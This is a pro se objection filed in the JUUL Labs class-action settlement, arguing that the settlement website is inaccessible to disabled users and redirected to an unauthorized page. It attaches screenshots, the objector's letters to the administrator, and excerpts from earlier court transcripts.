**RECEIVED**

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 1 of 20

**JAN 24 2024**

CLERK, U.S. DISTRICT COURT
NORTH DISTRICT OF CALIFORNIA

**EDWARD W. ORR**
122 Ridge Road
Terryville, CT 06786

# SENT TO THE COURT VIA NEXT-DAY PRIORITY MAIL EXPRESS:

# EI 475 346 205 US

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
450 Golden Gate Ave.
San Francisco, CA 94012

**SUBJECT:** **OBJECTION AND COMMENTARY OF EDWARD ORR REGARDING THE PROPOSED SETTLEMENT:** *In re JUUL Labs, Inc. Marketing, Sales Practices, and Products Liability Litigation, No. 19-md-02913-WHO (N.D. Cal.);*

**(ADDITIONAL REQUISITE DETAILS, INCLUDING, BUT NOT LIMITED TO, NAME, ADDRESS, CONTACT INFOR-**

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 2 of 20

## MATION, REASONS FOR OBJECTION, ETC., ARE SHOWN BELOW)

## <u>OBJECTION AND NOTICE OF INTENT TO APPEAR AT THE FINAL APPROVAL HEARING</u> (of Edward W. Orr; 122 Ridge Road; Terryville, CT 06786 [Telephone: 203-658-4977] [Email eanddorr2@gmail.com])[1]

---

[1] Objector Orr suffers from both auditory and visual handicaps (in addition to being in a wheelchair and suffering from mobility handicaps resulting from spinal cord injuries associated with two fractured cervical vertebrae and four fractured lumbar vertebrae caused by an intoxicated driver who, travelling at 120 MPH, collided with Orr's automobile). The undersigned intends to appear at the Final Fairness Hearing, and respectfully requests permission from the Court to speak and/or communicate via telephone, as his physical handicaps prevent both travel and the usage of Zoom and/or related technologies. Orr brings this Objection in good faith, and in order to avoid doubt about his motives, Orr is more than willing to stipulate to an injunction prohibiting him from accepting compensation in exchange for the settlement of this Objection; see generally Brian T. Fitzpatrick, "The End of Objector Blackmail?" 62 VAND. L. REV. 1623 (2009) (suggesting inalienability of objections as solution to objector blackmail problem).  In other words, Orr wants nothing more than constructive action, and is advocating for those injured by Juul's actions (and/or the actions of its affiliates, et al), and/or for those who have been unfairly treated by Juul (and/or its affiliates), to receive proper relief, and to be treated equitably – thus the filing of this Objection, as the undersigned received Notice.

As mentioned above, the undersigned intends to appear at the Final Fairness Hearing, and respectfully requests permission from the Court to speak and/or communicate via telephone, as his physical handicaps prevent both travel and the usage of Zoom and/or related technologies. Grounds for objection are contained in this Next-Day Delivery mailing; and all pages and exhibits and/or legal and evidentiary support herein are submitted with the request that the Court consider them. It is requested that all pages and/or exhibits of this submission (please note that, in addition to the objection cover letter and the hard-copy exhibits, there is a 32 GB USB drive containing information and exhibits, etc., which is attached as part of Exhibit "A") be submitted into evidence immediately. In addition, the Objector intends to utilize all pages and/or exhibits of this submission as evidence at the Settlement Fairness Hearing. The undersigned also hereby states that, as a result of the current and/or prior State of National Emergency (and/or concomitant events in the Objector's current state of residence, the State of Connecticut), Orr has prepared and proofread this Objection to the best of his ability (owing to the physical handicaps of the undersigned, several friends and family members have assisted and/or acted in agency as required in the preparation of this document, with such disability-related assistance including the assistance of one or more persons holding power of attorney, persons

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 3 of 20

The undersigned is a member of the Class.

"I declare under penalty of perjury under the laws of the United States of America that Edward W. Orr is a member of the Class."

I am objecting to the Settlement.

\*     \*     \*     \*     \*     \*     \*     \*

who have also assisted with voice machinery/substitution and/or related, and who may also do so in the future if necessary) under the constraints at hand, including, but not limited to, time constraints, et al. It is hoped that all page and/or exhibit references and/or related are correct, and the undersigned has proofread this document (referring here to the Orr Objection) a minimum of four times, with multiple reviewers/proofreaders assisting. The undersigned is not an attorney, and has prepared this Objection to the best of his ability; Orr has submitted this document in good faith. Please note that -- in regard to the herein-described security breaches, hacking activities, and/or related (many such breaches and/or activities have been related to Juul's and/or affiliates' website(s) (including but not limited to Juul/Facebook links and/or other links, etc.), activities and/or related.

Copy provided also to the administrator:

In re JUUL Labs, Inc.
Settlement Administrator
P.O. Box 5730
Portland, OR 97228–5730
(Email: info@JUULClassAction.com)

Page 3 of 20

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 4 of 20

Dear Sir or Madam:

The Jewish Federation and the Jewish Braille Institute recommended that the undersigned, who is physically handicapped, submit this Objection: The proposed Settlement should not be approved because the Settlement website is neither properly handicap accessible, nor is the website secure, as shown in the following Exhibits --- Exhibit "A," Exhibit "B," Exhibit "C," and Exhibit "D": (Either way, whether the potential Claimant is handicapped or not, the website is so obfuscating that many potential claimants are completely discouraged from endeavoring to make a claim. Concomitantly, the website is so poorly designed that many potential claimants are completely discouraged from endeavoring to make a claim.)

\* \* \* \* \* \* \* \*

Exhibit "A"

10-23-2023 screenshot showing that the class action website was redirecting to another site – the latter of which was an unauthorized site.

Page 4 of 20

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 5 of 20

Please see the attached screenshot displaying the redirection banner along with the redirection destination, etc.

Exhibit "B"

11-2-2023 screenshot showing that the class action website was redirecting to another site – the latter of which was an unauthorized site.

Please see the attached screenshot displaying the redirection banner along with the redirection destination, etc.

Exhibit "C"

1-7-2024 screenshot showing that the class action website was redirecting to another site – the latter of which was an unauthorized site.

Please see the attached screenshot displaying the redirection banner along with the redirection destination, etc.

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 6 of 20

Exhibit "D"

1-8-2024 screenshot showing that the class action website was redirecting

to another site – the latter of which was an unauthorized site.

Please see the attached screenshot displaying the redirection banner along

with the redirection destination, etc.

* * * * * * * *

**Such problems were pointed out to the Administrator on**

**multiple occasions, as shown in the following Exhibits ---**

**Exhibit "E," Exhibit "F," Exhibit "G," Exhibit "H," and**

**Exhibit "I": (The Administrator did not fix the problems.**

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 7 of 20

## Nor did the Administrator respond in any manner whatsoever to repeated communications.)

* * * * * * * *

Exhibit "E"

Screenshot of 10-23-2023 message sent (via the website's internal system) to the Administrator.

Exhibit "F"

Another message sent (to the Administrator) on 10-23-2023, this time via email.

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 8 of 20

Exhibit "G"

10-23-2023 letter (to the Administrator) sent via mail.

Subjects included the following:

**RE: I.   SERIOUS PROBLEMS WITH YOUR WEBSITE**

**II.   YOUR SITE SOMETIMES REDIRECTS TO AN UNAUTHORIZED SITE**

**(PLEASE SEE ATTACHED SCREENSHOT)**

**III.   APPARENTLY YOUR SITE IS NOT A SECURE SITE**

**IV.   IT HAS APPARENTLY BEEN HACKED, AND IS THEREFORE REDIRECTING**

**V.   YOUR SITE IS NOT CAPABLE OF WCAG AND/OR OTHER STANDARDS, AND ACCESS IS NOT FULLY POSSIBLE.**

**I HAVE SENT YOU A MESSAGE THROUGH YOUR WEBSITE (SCREENSHOT THEREOF ATTACHED)**

**I HAVE ALSO SENT YOU AN EMAIL (COPY ATTACHED)**

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 9 of 20

Exhibit "H"

12-01-2023 letter (to the Administrator) sent via mail.

Subjects included the following:

**RE:  I.     SERIOUS PROBLEMS WITH YOUR WEBSITE**

**II.    YOUR SITE SOMETIMES REDIRECTS TO AN
UNAUTHORIZED SITE**

**(PLEASE SEE ATTACHED SCREENSHOT)**

**III.   APPARENTLY YOUR SITE IS NOT A SECURE SITE**

**IV.    IT HAS APPARENTLY BEEN HACKED, AND IS
THEREFORE REDIRECTING**

**V.     YOUR SITE IS NOT CAPABLE OF WCAG AND/OR
OTHER STANDARDS, AND ACCESS IS NOT FULLY
POSSIBLE.**

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 10 of 20

**I HAVE SENT YOU A MESSAGE THROUGH YOUR WEBSITE (SCREENSHOT THEREOF ATTACHED)**

**I HAVE ALSO SENT YOU AN EMAIL (COPY ATTACHED)**

**VI. THE ABSENCE OF A RESPONSE BY THE ADMINISTRATOR**

Exhibit "I"

1-07-2024 letter (to the Administrator) sent via mail.

Subjects included the following:

**RE: I. SERIOUS PROBLEMS WITH YOUR WEBSITE**

**II. YOUR SITE SOMETIMES REDIRECTS TO AN UNAUTHORIZED SITE**

**(PLEASE SEE ATTACHED SCREENSHOT)**

**III. APPARENTLY YOUR SITE IS NOT A SECURE SITE**

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 11 of 20

IV.    IT HAS APPARENTLY BEEN HACKED, AND IS THEREFORE REDIRECTING

V.    YOUR SITE IS NOT CAPABLE OF WCAG AND/OR OTHER STANDARDS, AND ACCESS IS NOT FULLY POSSIBLE.

I HAVE SENT YOU A MESSAGE THROUGH YOUR WEBSITE (SCREENSHOT THEREOF ATTACHED)

I HAVE ALSO SENT YOU AN EMAIL (COPY ATTACHED)

VI.    THE ABSENCE OF A RESPONSE BY THE ADMINISTRATOR

\*   \*   \*   \*   \*   \*   \*   \*

The undersigned wants nothing more than the existence of a fair settlement.

Unfortunately, there is nothing whatsoever fair about either the settlement site or about the Administrator's lack to response to serious problems.

The website is so insecure, that it sometimes redirects users to a nonexistent and/or hacked Facebook connection.

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 12 of 20

In addition, the site is not handicap accessible.

The Settlement should not be approved.

The Jewish Federation recommended that the undersigned continue to pursue the matter of inequities in regard to Juul's and/or Facebook's actions in this case, and therefore – as a follow-up to the FBI's involvement, and to Attorney Steven Winick's pro bono representation (per the Jewish Federation of Northern California) of the Orr family in regard to Facebook and several Facebook-related matters (see Exhibit "J," Exhibit "K," and Exhibit "L, and cross-references thereto), this Objection is respectfully submitted.

"Class-action settlements are different from other settlements." In re Dry Max Pampers Litig., 724 F.3d 713, 715 (6th Cir. 2013). "[T]he district court cannot rely on the adversarial process to protect the interests of the persons most affected by the litigation—namely, the class." Id. at 718. Instead, "[c]areful scrutiny by the court is necessary to guard against settlements that may benefit the class representatives or their attorneys at

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 13 of 20

the expense of the absent class members." Holmes v. Cont'l Can Co., 706

F.2d 1144, 1147 (11th Cir. 1983) (quotation omitted). "[T]he district judge

has a heavy duty to ensure that any settlement is 'fair, reasonable, and

adequate' and that the fee awarded plaintiffs' counsel is entirely

appropriate." Piambino v. Bailey, 757 F.2d 1112, 1139 (11th Cir. 1985)

("Piambino II"). This duty is "akin to the high duty of care that the law

requires of fiduciaries." Figueroa v. Sharper Image Corp., 517 F. Supp. 2d

1292, 1320 (S.D. Fla. 2007) (quoting Synfuel Techs., Inc. v. DHL Express

(USA), Inc., 463 F.3d 646, 652 (7th Cir. 2006)).


Ultimately, "[b]oth the class representative and the courts have a duty to

protect the interests of absent class members." Silber v. Mabon, 957 F.2d

697, 701 (9th Cir. 1992).


Orr objects because the proposed settlement is unfair. Accordingly, the

proposed Settlement Agreement and/or related should not be approved.


As emphasized above, the undersigned is objecting in good faith on behalf

of those who have been adversely affected.


Page 13 of 20

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 14 of 20

Multiple courts have recognized the undersigned's good faith efforts.

Multiple excerpts from one such case are shown below:

MR. SELLERS: Thank you, Your Honor. You've already, as usual, anticipated many of the points that I'd make and don't need to say again. I would like to say one thing to Mr. Orr, if I may, which is that, notwithstanding that we respectfully disagree with the objections he raised, we applaud and really appreciate his participation in the process today and hope he will continue to remain actively involved in legal proceedings like this around the country. We really admire what he's done, and as I said, while we disagree with the substance of it, we really appreciate his involvement..."

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 15 of 20

SOURCE:   NATIONAL ASSOCIATION OF THE DEAF, : on behalf of
its members, : C. WAYNE DORE, CHRISTY SMITH, : LEE NETTLES,
on behalf of : themselves and a proposed class : of similarly situated
persons : defined below, : Civil Action No. : 3:15-cv-30024-KAR
Plaintiffs, : : v. : : MASSACHUSETTS INSTITUTE OF :
TECHNOLOGY, : : Defendant. : -BEFORE THE HONORABLE
KATHERINE A. ROBERTSON, MAGISTRATE JUDGE FAIRNESS
HEARING BY VIDEO CONFERENCE Tuesday, July 14, 2020 10:07 a.m.

(Copy of the Court transcript attached in Exhibit "K"[2]; please see Pages 10
– 11.)

THE COURT: "Thank you. Thank you. I also wanted to say
to Mr. Orr, if I didn't clearly, sort of, convey this, that we
appreciate the thought and attention that went into the
objections that you raised, and I hope it was clear that the

---

[2] Please note that the case issues were ongoing and interrelated to subsequent cases, etc., thus additional case documents and/or cross-references shown where applicable per FBI investigations, etc., in Exhibit "K," et al.

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 16 of 20

Court took them seriously and reviewed the content of the

consent decree. I wanted to add one other thing, and that was

that Mr. Orr identified problems with accessing the online

form that the Court made available for objecting to the terms

of the consent decree."


"I really regret that. I think anybody who has had, you know,

problems with filling out online forms can understand how

frustrating that is. And we had hoped that, you know -- that

that would be an additional avenue to make objections known

to the Court and that it would be comparatively simple. And if

it didn't work, all I can do is apologize for whatever

frustration was added to the process by any malfunctioning of

that form..."


SOURCE:     NATIONAL ASSOCIATION OF THE DEAF, : on behalf of

its members, : C. WAYNE DORE, CHRISTY SMITH, : LEE NETTLES,

on behalf of : themselves and a proposed class : of similarly situated

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 17 of 20

persons : defined below, : Civil Action No. : 3:15-cv-30024-KAR

Plaintiffs, : : v. : : MASSACHUSETTS INSTITUTE OF :

TECHNOLOGY, : : Defendant. : -BEFORE THE HONORABLE

KATHERINE A. ROBERTSON, MAGISTRATE JUDGE FAIRNESS

HEARING BY VIDEO CONFERENCE Tuesday, July 14, 2020 10:07 a.m.

(Copy of the Court transcript attached in Exhibit "K"; please see Pages 12

– 13.)

*     *     *     *     *     *     *     *

Thank you.

Sincerely,

Edward Anv ery<sub></sub>

Edward W. Orr[3]

---

[3] Objector Orr suffers from both auditory and visual handicaps (in addition to being in a wheelchair
and suffering from mobility handicaps resulting from spinal cord injuries associated with two
fractured cervical vertebrae and four fractured lumbar vertebrae caused by an intoxicated driver who,
travelling at 120 MPH, collided with Orr's automobile). The undersigned intends to appear at the
Final Fairness Hearing, and respectfully requests permission from the Court to speak and/or

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 18 of 20

## 122 Ridge Road

communicate via telephone, as his physical handicaps prevent both travel and the usage of Zoom and/or related technologies. Orr brings this Objection in good faith, and in order to avoid doubt about his motives, Orr is more than willing to stipulate to an injunction prohibiting him from accepting compensation in exchange for the settlement of this Objection; see generally Brian T. Fitzpatrick, "The End of Objector Blackmail?" 62 VAND. L. REV. 1623 (2009) (suggesting inalienability of objections as solution to objector blackmail problem). In other words, Orr wants nothing more than constructive action, and is advocating for those injured by Juul's actions (and/or the actions of its affiliates, et al), and/or for those who have been unfairly treated by Juul (and/or its affiliates), to receive proper relief, and to be treated equitably – thus the filing of this Objection, as the undersigned received Notice.

As mentioned above, the undersigned intends to appear at the Final Fairness Hearing, and respectfully requests permission from the Court to speak and/or communicate via telephone, as his physical handicaps prevent both travel and the usage of Zoom and/or related technologies. Grounds for objection are contained in this Next-Day Delivery mailing; and all pages and exhibits and/or legal and evidentiary support herein are submitted with the request that the Court consider them. It is requested that all pages and/or exhibits of this submission (please note that, in addition to the objection cover letter and the hard-copy exhibits, there is a 32 GB USB drive containing information and exhibits, etc., which is attached as part of Exhibit "A") be submitted into evidence immediately. In addition, the Objector intends to utilize all pages and/or exhibits of this submission as evidence at the Settlement Fairness Hearing. The undersigned also hereby states that, as a result of the current and/or prior State of National Emergency (and/or concomitant events in the Objector's current state of residence, the State of Connecticut), Orr has prepared and proofread this Objection to the best of his ability (owing to the physical handicaps of the undersigned, several friends and family members have assisted and/or acted in agency as required in the preparation of this document, with such disability-related assistance including the assistance of one or more persons holding power of attorney, persons who have also assisted with voice machinery/substitution and/or related, and who may also do so in the future if necessary) under the constraints at hand, including, but not limited to, time constraints, et al. It is hoped that all page and/or exhibit references and/or related are correct, and the undersigned has proofread this document (referring here to the Orr Objection) a minimum of four times, with multiple reviewers/proofreaders assisting. Please note that, in instances where one or more exhibits may contain material(s) shown in another exhibit – the material(s) may be shown in only one exhibit herein, in order to conserve paper and to avoid repetition of exhibits and/or the contents thereof. The undersigned is not an attorney, and has prepared this Objection to the best of his ability; Orr has submitted this document in good faith. Please note that -- in regard to the herein-described security breaches, hacking activities, and/or related (many such breaches and/or activities have been related to Juul's and/or affiliates' website(s) (including but not limited to Juul/Facebook links and/or other links, etc.), activities and/or related.

Copy provided also to the administrator:

In re JUUL Labs, Inc.
Settlement Administrator
P.O. Box 5730
Portland, OR 97228–5730
(Email: info@JUULClassAction.com)

Page 18 of 20

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 19 of 20

Terryville, CT 06786


Telephone: 203-658-4977
Email Address: eanddorr2@gmail.com
Telefax Number: (860) 582-4857


CRS/DDO:fw7269313982r


Enc.: As described and/or referenced herein


cc:     S. Winick (per regular mail/prm)


        S. Solender (per regular mail/prm)


        S. Specter (per regular mail/prm)


        DC File/351292381033f/re (per regular mail/prm)


        Social Security Administration (per regular mail/prm)


        Yale Medical School/DK (per regular mail/prm)


        Reliance Standard (per regular mail/prm)

Office of the Clerk of Court
U.S. District Court for
the Northern District of California
January 22, 2024
Page 20 of 20

University of Conn. Medical School/J.Cannon Ref. EWO/3063(per regular mail/prm)

SBI/DC Trust (per regular mail/prm)



# October 23, 2023

The class action website redirected to another site --- the latter of which was an unauthorized site.

(Please see the attached screenshot displaying the redirection banner along with the redirection destination, etc.)

v.juulclassaction.com

Case 3:19-md-02913-WHO   Document 4194   Filed 01/24/24   Page 23 of 223

shc Reporting   M Inbox (1,541) - ean...   G Google   Big Y LIFE Connecti...   SofCare Overlay St...   Au Mattress & Infla...   Apply for Social Sec...   Big Y LIFE Connecti...   Big Y LIFE Connecti...   Brian Stewart Depa...

ibs, Inc.                                                                                       Home   FAQs   Documents   Updates   Submit a Cla

## Frequently Asked Questions

Key Information ✓

Learning About The Lawsuit ✓

The Terms Of The Settlement ✓

Settlement Class Member Options ✓

Opting Out/Excluding Yourself ✓

The Lawyers Representing You ✓

Key Resources ✓

https://www.juulclassaction.com/en/Home/FAQ

is experiencing difficulties, and is redirecting to
Key Information
https://www.facebook.com....

### 1. What is happening in this lawsuit?

A group of people filed a class action lawsuit against JUUL Labs. Inc., related individuals, and Altria. These plaintiffs claimed that Altria was a part of an enterprise that misled consumers concerning JUUL products' addictiveness and safety, causing them to pay more than they would have had accurate information been provided. They allege that the enterprise that Altria was a part of unlawfully marketed to minors. Altria denies these allegations.

In a settlement announced in December 2022, JUUL Labs, on behalf of itself, its directors and officers, and other entities (collectively referred to as JUUL), agreed to pay $255 million to settle claims against it. Now, the remaining defendants—Altria and related companies—have agreed to pay an additional $45 million to settle the remaining claims in the case.

The group of people who both JUUL and Altria have agreed to pay is called the Settlement Class and it includes everyone who purchased JUUL products from retail stores or online retailers or from JUUL directly before December 7, 2022. If you are in this group and want to get paid, you must **file a claim** If you already submitted a claim as part of the first settlement involving JUUL, you do not need to submit anything further to receive payment from the new settlement involving Altria. If you have *not* submitted a claim previously, you can do so by returning a claim form to the Settlement Administrator by mail or by making a claim on this website here

       



# EXHIBIT B

# November 2, 2023

The class action website redirected to <u>another site</u> --- the latter of which was an <u>unauthorized</u> site.

(Please see the attached screenshot displaying the redirection banner along with the redirection destination, etc.)

v.juulclassaction.com

Case 3:19-md-02913-WHO   Document 4194   Filed 01/24/24   Page 27 of 223

blic Reporting   Inbox (1,541) - ean...   Google   Big Y LIFE Connecti...   SofCare Overlay St...   Air Mattress & Infla...   Apply for Social Sec...   Big Y LIFE Connect...   Big Y LIFE Connecti...   Brian Stewart Depa...

ibs, Inc.                                                                    Home   FAQs   Documents   Updates   Submit a Cla

# Frequently Asked Questions

Key Information ⌄

Learning About The Lawsuit ⌄

The Terms Of The Settlement ⌄

Settlement Class Member Options ⌄

Opting Out/Excluding Yourself ⌄

The Lawyers Representing You ⌄

Key Resources ⌄

https://www.juulclassaction.com/en/Home/FAQ

is experiencing difficulties, and is redirecting to
Key Information
https://www.facebook.com....

1. What is happening in this lawsuit?

A group of people filed a class action lawsuit against JUUL Labs. Inc., related individuals, and Altria. These plaintiffs claimed that Altria was a part of an enterprise that misled consumers concerning JUUL products' addictiveness and safety, causing them to pay more than they would have had accurate information been provided. They allege that the enterprise that Altria was a part of unlawfully marketed to minors. Altria denies these allegations.

In a settlement announced in December 2022, JUUL Labs, on behalf of itself, its directors and officers, and other entities (collectively referred to as JUUL), agreed to pay $255 million to settle claims against it. Now, the remaining defendants—Altria and related companies—have agreed to pay an additional $45 million to settle the remaining claims in the case.

The group of people who both JUUL and Altria have agreed to pay is called the Settlement Class and it includes everyone who purchased JUUL products from retail stores or online retailers or from JUUL directly before December 7, 2022. If you are in this group and want to get paid, you must file a claim. If you already submitted a claim as part of the first settlement involving JUUL, you do not need to submit anything further to receive payment from the new settlement involving Altria. If you have not submitted a claim previously you can do so by returning a claim form to the Settlement Administrator by mail or by making a claim on this website here.

         

# EXHIBIT C

# January 7, 2024

The class action website redirected to another site --- the latter of which was an unauthorized site.

(Please see the attached screenshot displaying the redirection banner along with the redirection destination, etc.)



ibs, Inc.

Home    FAQs    Documents    Updates    Submit a Cla

## Frequently Asked Questions

Key Information ⊙

Learning About The Lawsuit ⊙

The Terms Of The Settlement ⊙

Settlement Class Member Options ⊙

Opting Out/Excluding Yourself ⊙

The Lawyers Representing You ⊙

Key Resources ⊙



https://www.juulclassaction.com/en/Home/FAQ

is experiencing difficulties, and is redirecting to
Key Information
https://www.facebook.com....

### 1. What is happening in this lawsuit?

A group of people filed a class action lawsuit against JUUL Labs, Inc., related individuals, and Altria. These plaintiffs claimed that Altria was a part of an enterprise that misled consumers concerning JUUL products' addictiveness and safety, causing them to pay more than they would have had accurate information been provided. They allege that the enterprise that Altria was a part of unlawfully marketed to minors. Altria denies these allegations.

In a settlement announced in December 2022, JUUL Labs, on behalf of itself, its directors and officers, and other entities (collectively referred to as JUUL), agreed to pay $255 million to settle claims against it. Now, the remaining defendants—Altria and related companies—have agreed to pay an additional $45 million to settle the remaining claims in the case.

The group of people who both JUUL and Altria have agreed to pay is called the Settlement Class and it includes everyone who purchased JUUL products from retail stores or online retailers or from JUUL directly before December 7, 2022. If you are in this group and want to get paid, you must **file a claim**. If you already submitted a claim as part of the first settlement involving JUUL, you do not need to submit anything further to receive payment from the new settlement involving Altria. If you have *not* submitted a claim previously you can do so by returning a claim form to the Settlement Administrator by mail or by making a claim on this website here.

         

# EXHIBIT D

# January 8, 2024

The class action website redirected to <u>another site</u> --- the latter of which was an <u>unauthorized</u> site.

(Please see the attached screenshot displaying the redirection banner along with the redirection destination, etc.)

ubs, Inc.

Home   FAQs   Documents   Updates   Submit a Cla

## Frequently Asked Questions

| Key Information ⌄ | Learning About The Lawsuit ⌄ | The Terms Of The Settlement ⌄ |
| Settlement Class Member Options ⌄ | Opting Out/Excluding Yourself ⌄ | The Lawyers Representing You ⌄ |
| Key Resources ⌄ | | |



https://www.juulclassaction.com/en/Home/FAQ

is experiencing difficulties, and is redirecting to
Key Information
https://www.facebook.com....

1. **What is happening in this lawsuit?**

A group of people filed a class action lawsuit against JUUL Labs, Inc., related individuals, and Altria. These plaintiffs claimed that Altria was a part of an enterprise that misled consumers concerning JUUL products' addictiveness and safety, causing them to pay more than they would have had accurate information been provided. They allege that the enterprise that Altria was a part of unlawfully marketed to minors. Altria denies these allegations.

In a settlement announced in December 2022, JUUL Labs, on behalf of itself, its directors and officers, and other entities (collectively referred to as JUUL) agreed to pay $255 million to settle claims against it. Now, the remaining defendants—Altria and related companies—have agreed to pay an additional $45 million to settle the remaining claims in the case.

The group of people who both JUUL and Altria have agreed to pay is called the Settlement Class and it includes everyone who purchased JUUL products from retail stores or online retailers or from JUUL directly before December 7, 2022. If you are in this group and want to get paid, you must **file a claim**. If you already submitted a claim as part of the first settlement involving JUUL, you do not need to submit anything further to receive payment from the new settlement involving Altria. If you have **not** submitted a claim previously you can do so by returning a claim form to the Settlement Administrator by mail or by making a claim on this website here.

         

# EXHIBIT E

# lbs, Inc.

If you have any questions regarding this lawsuit, you may contact the Settlement Administrator. Please ensure that you include your name and your return address on all correspondence.

✉ **Email Us:**
info@JUULClassAction.com

☎ **Call Us:**
1-855-604-1734 (Toll-Free)
Call Center Hours: 6 a.m. – 6 p.m. PST
Monday – Friday except Holidays

✎ **Write Us:**
In re JUUL Labs. Inc.
Settlement Administrator
P.O. Box 5730
Portland. OR 97228–5730

## Send Us A Message:

Edward W Orr

eanddorr2@gmail.com

Apparently the website is not capable of meeting WCAG and/or similar standards. and access is not fully possible. Please correct

✓ I'm not a robot


reCAPTCHA
Privacy - Terms

Send

# EXHIBIT F

 Gmail

Edward Orr <eanddorr2@gmail.com>

---

## INACCESSIBILITY

1 message

---

**Edward Orr** <eanddorr2@gmail.com>
To: info@juulclassaction.com
Bcc: Edward Orr <eanddorr2@gmail.com>

Mon, Oct 23, 2023 at 4:46 PM

This is to confirm that a message was sent to you on your website regarding inaccessibility.  Please correct.

Edward Orr

# EXHIBIT G

**EDWARD W. ORR**
122 Ridge Road
Terryville, CT 06786

October 23, 2023

In re JUUL Labs, Inc.
Settlement Administrator
P.O. Box 5730
Portland, OR 97228–5730

RE:  I.     **SERIOUS PROBLEMS WITH YOUR WEBSITE**

    II.    **YOUR SITE SOMETIMES REDIRECTS TO AN UNAUTHORIZED SITE**

       **(PLEASE SEE ATTACHED SCREENSHOT)**

    III.   **APPARENTLY YOUR SITE IS NOT A SECURE SITE**

    IV.    **IT HAS APPARENTLY BEEN HACKED, AND IS THEREFORE REDIRECTING**

    V.     **YOUR SITE IS NOT CAPABLE OF WCAG AND/OR OTHER STANDARDS, AND ACCESS IS NOT FULLY POSSIBLE.**

       **I HAVE SENT YOU A MESSAGE THROUGH YOUR WEBSITE (SCREENSHOT THEREOF ATTACHED)**

       **I HAVE ALSO SENT YOU AN EMAIL (COPY ATTACHED)**

Dear Sir or Madam:

As described above, several serious problems exist; please correct them.

1

Thank you very much for your attention to this matter.

Sincerely,

Edward W. Orr
Telephone: 203-658-4977

Enc.: As described above

SRS6284a

cc:    S.Winick
       S. Specter

2



**EDWARD W. ORR**
122 Ridge Road
Terryville, CT 06786

December 1, 2023

In re JUUL Labs, Inc.
Settlement Administrator
P.O. Box 5730
Portland, OR 97228–5730

**RE:**   I.   **SERIOUS PROBLEMS WITH YOUR WEBSITE**

      II.   **YOUR SITE SOMETIMES REDIRECTS TO AN UNAUTHORIZED SITE**

          **(PLEASE SEE ATTACHED SCREENSHOT)**

      III.   **APPARENTLY YOUR SITE IS NOT A SECURE SITE**

      IV.   **IT HAS APPARENTLY BEEN HACKED, AND IS THEREFORE REDIRECTING**

      V.   **YOUR SITE IS NOT CAPABLE OF WCAG AND/OR OTHER STANDARDS, AND ACCESS IS NOT FULLY POSSIBLE.**

          **I HAVE SENT YOU A MESSAGE THROUGH YOUR WEBSITE (SCREENSHOT THEREOF ATTACHED)**

          **I HAVE ALSO SENT YOU AN EMAIL, (COPY ATTACHED)**

Dear Sir or Madam:

As described above, several serious problems exist; please correct them.

I sent a letter to you on October 23, 2023, and you have not responded.

1

Please respond.

Sincerely,

Edward W. Orr
Telephone: 203-658-4977

Enc.: As described above

SRS6296b

cc:    S. Winick
       S. Specter



**EDWARD W. ORR**
122 Ridge Road
Terryville, CT 06786

January 7, 2024

In re JUUL Labs, Inc.
Settlement Administrator
P.O. Box 5730
Portland, OR 97228–5730

**RE:** I.  **SERIOUS PROBLEMS WITH YOUR WEBSITE**

II.  **YOUR SITE SOMETIMES REDIRECTS TO AN UNAUTHORIZED SITE**

**(PLEASE SEE ATTACHED SCREENSHOT)**

III.  **APPARENTLY YOUR SITE IS NOT A SECURE SITE**

IV.  **IT HAS APPARENTLY BEEN HACKED, AND IS THEREFORE REDIRECTING**

V.  **YOUR SITE IS NOT CAPABLE OF WCAG AND/OR OTHER STANDARDS, AND ACCESS IS NOT FULLY POSSIBLE.**

**I HAVE SENT YOU A MESSAGE THROUGH YOUR WEBSITE (SCREENSHOT THEREOF ATTACHED)**

**I HAVE ALSO SENT YOU AN EMAIL (COPY ATTACHED)**

Dear Sir or Madam:

As described above, several serious problems exist; please correct them.

I sent letters to you on October 23, 2023, and on December 1,2023.

1

You have not responded.

Please respond.

Sincerely,

Edward W. Orr
Telephone: 203-658-4977

Enc.: As described above

SRS6304r

cc:     S.Winick
        S. Specter

2



Pages 1 - 54

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

BEFORE THE HONORABLE JON S. TIGAR, JUDGE

MICHAEL EDENBOROUGH, et al.,          )
                                      )
          Plaintiffs,                 )
                                      )
VS.                                   ) NO. C 16-02233 JST
                                      )
ADT, LLC,                             )
                                      ) San Francisco, California
          Defendant.                  )
_____)

Thursday, February 1, 2018

**TRANSCRIPT OF PROCEEDINGS**

**APPEARANCES:**

For Plaintiffs:
                    ZIMMERMAN LAW OFFICES, P.C.
                    77 West Washington Street
                    Suite 1220
                    Chicago, Illinois 60602
                BY: **THOMAS A. ZIMMERMAN, JR., ESQ.**

                    CHAVEZ & GERTLER LLP
                    42 Miller Avenue
                    Mill Valley, California 93941
                BY: **MARK A. CHAVEZ, ESQ.**

                    BONNETT FAIRBOURN
                       FRIEDMAN & BALINT, P.C.
                    2325 East Camelback Road
                    Suite 3000
                    Phoenix, Arizona 85016
                BY: **FRANCIS J. BALINT, JR., ESQ.**

Reported By: **BELLE BALL, CSR 8785, CRR, RDR**
